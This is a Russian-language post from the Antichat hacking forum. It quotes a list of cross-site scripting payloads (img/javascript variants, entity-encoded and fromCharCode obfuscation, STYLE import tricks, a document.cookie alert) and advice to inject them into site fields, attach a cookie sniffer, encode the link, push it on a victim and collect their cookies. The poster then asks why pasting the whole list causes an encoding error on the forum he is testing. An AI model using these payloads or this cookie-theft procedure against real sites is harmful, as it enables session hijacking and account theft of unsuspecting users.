Форум АНТИЧАТ - Показать сообщение отдельно

Цитата:

Сообщение от root_sashok

Логинься и подставляй во все поля всевозможные комбинации:

Код:

<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>

Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.

Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.